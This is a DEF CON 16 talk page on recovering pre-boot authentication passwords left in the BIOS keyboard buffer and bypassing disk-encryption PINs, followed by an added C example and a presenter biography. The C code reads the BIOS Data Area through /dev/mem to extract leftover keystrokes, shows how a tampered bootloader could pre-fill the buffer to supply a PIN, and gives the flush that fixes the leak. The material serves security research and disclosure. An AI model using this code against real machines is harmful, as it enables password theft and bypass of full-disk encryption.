Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software)

Presented at DEF CON 16 (2008), Aug. 10, 2008, 1 p.m. (50 minutes)

Pre-boot authentication software, in particular full hard disk encryption software, plays a key role in preventing information theft. In this paper, we present a new class of vulnerability affecting multiple high-value pre-boot authentication products, including the latest Microsoft disk encryption technology: Windows Vista's BitLocker, with the TPM chip enabled. Because pre-boot authentication software programmers commonly make wrong assumptions about the inner workings of the BIOS interrupts responsible for handling keyboard input, they typically use the BIOS API without flushing or initializing the BIOS internal keyboard buffer. Therefore, any user input, including plaintext passwords, remains in memory at a known physical location. In this article, we first present a detailed analysis of this new class of vulnerability and generic exploits for Windows and Unix platforms on the x86 architecture. Unlike current academic research aimed at extracting information from RAM, our practical methodology does not require any physical access to the computer to extract plaintext passwords from physical memory. In a second part, we present how this information leakage, combined with use of the BIOS API without careful initialization of the BIOS keyboard buffer, can lead to a computer reboot without console access and a full bypass of the pre-boot authentication PIN if an attacker has enough privileges to modify the bootloader. Other related work includes information leakage from CPU caches, reading physical memory via FireWire, and switching CPU modes.
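The mechanism behind the abstract, as an added example that is not code from the paper or from Iviz: the BIOS keeps the keystrokes returned by INT 16h in a small ring buffer inside the BIOS Data Area (segment 0x40, physical 0x400-0x4FF; head pointer at 0x40:0x1A, tail pointer at 0x40:0x1C, 16 two-byte ASCII/scan-code entries at 0x40:0x1E by default). Reading a key only advances the head pointer, so whatever a pre-boot prompt consumed is still in those 32 bytes once the OS is up. The C below models that buffer on a snapshot: it recovers the typed password from the slots regardless of the "empty" head/tail state, shows how a tampered bootloader could pre-fill the ring so the prompt reads a PIN without anyone at the console (scan-code bytes left 0, assuming the prompt only looks at the ASCII byte), and shows the flush the prompt should have done. The function names, the constructed snapshot and the /dev/mem read are my choices; the live read needs root on a legacy-BIOS Linux box and may be refused by kernel /dev/mem restrictions, and on UEFI systems the BDA is not populated at all.

```c
/*
 * Added example (not from the DEF CON paper): model of the BIOS Data Area (BDA)
 * keyboard ring buffer that pre-boot prompts read through INT 16h.
 *
 * Standard BDA layout, physical segment 0x40 (addresses 0x400-0x4FF):
 *   0x40:0x1A  word  head: offset of the next keystroke INT 16h will return
 *   0x40:0x1C  word  tail: offset of the next free slot
 *   0x40:0x1E  32 bytes: 16 entries of (ASCII byte, scan-code byte)
 * INT 16h dequeues by advancing head only; the entry bytes are never cleared,
 * so a password typed at a pre-boot prompt stays readable after boot.
 */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BDA_PHYS    0x400u
#define BDA_LEN     0x100u
#define KBD_HEAD    0x1Au
#define KBD_TAIL    0x1Cu
#define KBD_START   0x1Eu   /* default ring bounds; 0x40:0x80/0x82 hold the actual ones */
#define KBD_END     0x3Eu   /* exclusive */
#define KBD_ENTRIES ((KBD_END - KBD_START) / 2)   /* 16 slots, 15 usable: full when next(tail)==head */

static uint16_t rd16(const uint8_t *bda, unsigned off) { return (uint16_t)(bda[off] | (bda[off + 1] << 8)); }
static void wr16(uint8_t *bda, unsigned off, uint16_t v) { bda[off] = (uint8_t)v; bda[off + 1] = (uint8_t)(v >> 8); }
static unsigned ring_next(unsigned off) { off += 2; return off >= KBD_END ? KBD_START : off; }

/* The leak: walk all 16 slots starting at the tail (oldest surviving keystroke),
 * ignoring the head/tail "empty" state, and collect printable ASCII in typing order. */
size_t recover_keystrokes(const uint8_t *bda, char *out, size_t outlen)
{
    unsigned off = rd16(bda, KBD_TAIL);
    if (off < KBD_START || off >= KBD_END || (off & 1))
        off = KBD_START;                          /* corrupt pointer: scan from the start */
    size_t n = 0;
    for (unsigned i = 0; i < KBD_ENTRIES && n + 1 < outlen; i++, off = ring_next(off)) {
        uint8_t ascii = bda[off];                 /* low byte of the entry */
        if (ascii >= 0x20 && ascii < 0x7F)        /* skip empty slots, CR and scan-code-only keys */
            out[n++] = (char)ascii;
    }
    if (outlen)
        out[n] = '\0';
    return n;
}

/* The bypass (assumed shape, not the paper's code): a tampered bootloader pre-fills the
 * ring before chaining to the pre-boot loader, so the prompt's INT 16h reads return the
 * PIN with nobody at the console. Scan-code bytes stay 0: assumes the prompt uses AL only. */
int stuff_keystrokes(uint8_t *bda, const char *keys)
{
    size_t len = strlen(keys);
    if (len > KBD_ENTRIES - 1)                    /* a 16-slot ring holds 15 pending keys */
        return -1;
    memset(bda + KBD_START, 0, KBD_END - KBD_START);
    for (size_t i = 0; i < len; i++)
        bda[KBD_START + 2 * i] = (uint8_t)keys[i];
    wr16(bda, KBD_HEAD, KBD_START);
    wr16(bda, KBD_TAIL, (uint16_t)(KBD_START + 2 * len));
    return (int)len;
}

/* The fix a prompt should apply after consuming the password: zero the slots,
 * not just reset the pointers (in real mode these are far writes to segment 0x40). */
void flush_keyboard_buffer(uint8_t *bda)
{
    memset(bda + KBD_START, 0, KBD_END - KBD_START);
    wr16(bda, KBD_HEAD, KBD_START);
    wr16(bda, KBD_TAIL, KBD_START);
}

/* Constructed snapshot: "Secr3t" + Enter typed and fully consumed (head == tail). */
void make_sample_bda(uint8_t *bda)
{
    static const char typed[] = "Secr3t\r";
    memset(bda, 0, BDA_LEN);
    for (size_t i = 0; i < sizeof typed - 1; i++)
        bda[KBD_START + 2 * i] = (uint8_t)typed[i];
    wr16(bda, KBD_HEAD, (uint16_t)(KBD_START + 2 * (sizeof typed - 1)));
    wr16(bda, KBD_TAIL, (uint16_t)(KBD_START + 2 * (sizeof typed - 1)));
}

/* Live read on a legacy-BIOS Linux box: needs root, may be refused by /dev/mem restrictions. */
int read_live_bda(uint8_t *bda)
{
    int fd = open("/dev/mem", O_RDONLY);
    if (fd < 0)
        return -1;
    int ok = lseek(fd, (off_t)BDA_PHYS, SEEK_SET) == (off_t)BDA_PHYS
          && read(fd, bda, BDA_LEN) == (ssize_t)BDA_LEN;
    close(fd);
    return ok ? 0 : -1;
}

int main(void)
{
    uint8_t bda[BDA_LEN];
    char pw[KBD_ENTRIES + 1];
    if (read_live_bda(bda) != 0) {
        fprintf(stderr, "cannot read /dev/mem, using the constructed snapshot\n");
        make_sample_bda(bda);
    }
    size_t n = recover_keystrokes(bda, pw, sizeof pw);
    printf("%zu leaked keystroke(s): \"%s\"\n", n, pw);
    return 0;
}
```

Two details matter in practice: recover_keystrokes starts at the tail and wraps, so the order of the last 15 keystrokes survives even after more than one prompt has used the buffer, and a prompt that only resets head and tail (without the memset) still leaks, which is exactly the wrong assumption the abstract describes.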


Presenters:

  • Jonathan Brossard / endrazine - Lead Security Researcher, Iviz
    Jonathan Brossard is French, and has recently moved to India to build and lead the research and exploitation team of Iviz (http://www.ivizindia.com/iviz/aboutus.html). Jonathan's daily activities involve exploit writing, reverse engineering, code auditing and research in disruptive low-level hacking methodologies. Before moving to India, Jonathan worked as a security researcher in the defense area in France for Sagem Defense Securite, where he designed and patented new protection schemes for protecting applications against reverse engineering under GNU/Linux. Prior to that position, he also worked at the French pioneer pentesting consulting company Edelweb, so he has experience with both ends of the security industry... During college, Jonathan was employed as a network administrator of one of the major school networks in France, which gave him a strong taste for networking and network security. Jonathan started getting interested in low-level security issues more than 10 years ago, when he learnt x86 asm under MS-DOS. Many things have changed since those good old times of real-mode OSes, but there is still room for surprises... Low-level attacks involving deep knowledge of computer internals are not dead... just read the paper ;) Jonathan would also like to mention his ties to excellent security research groups such as pulltheplug.org and blacksecurity.org: this is where public information ends and where security research begins...
